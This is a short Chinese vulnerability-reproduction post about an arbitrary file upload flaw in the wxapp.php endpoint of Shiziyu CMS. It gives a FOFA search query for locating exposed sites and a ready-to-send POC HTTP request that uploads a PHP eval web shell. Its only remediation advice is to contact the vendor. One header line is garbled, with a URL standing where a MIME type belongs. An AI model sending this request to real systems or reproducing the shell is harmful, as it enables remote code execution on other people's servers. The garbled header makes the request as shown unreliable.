【漏洞复现】狮子鱼CMS文件上传漏洞(wxapp.php)

Nx01 产品简介

        狮子鱼CMS（Content Management System）是一种网站管理系统，它旨在帮助用户更轻松地创建和管理网站。该系统拥有用户友好的界面和丰富的功能，包括页面管理、博客、新闻、产品展示等。通过简单直观的管理界面，网站所有者可以方便地进行内容的发布、管理和布局。

Nx02 漏洞描述

        狮子鱼CMS wxapp.php文件存在任意文件上传漏洞，攻击者可能利用这个漏洞上传恶意文件并执行恶意代码。

Nx03 产品主页

fofa-query: body="/seller.php?s=/Public/login"

Nx04 漏洞复现

POC：

1. POST /wxapp.php?controller=Goods.doPageUpload HTTP/1.1
2. Host: {{Hostname}}
3. Content-Type: multipart/form-data; boundary=----WebKitFormBoundary8UaANmWAgM4BqBSs
5. ------WebKitFormBoundary8UaANmWAgM4BqBSs
6. Content-Disposition: form-data; name="upfile"; filename="test.php"
7. Content-Type: http://peiqi-wiki-poc.oss-cn-beijing.aliyuncs.com/vuln/gif
9. <?php @eval($_POST['test']);?>
10. ------WebKitFormBoundary8UaANmWAgM4BqBSs--

Nx05 修复建议

建议联系软件厂商进行处理。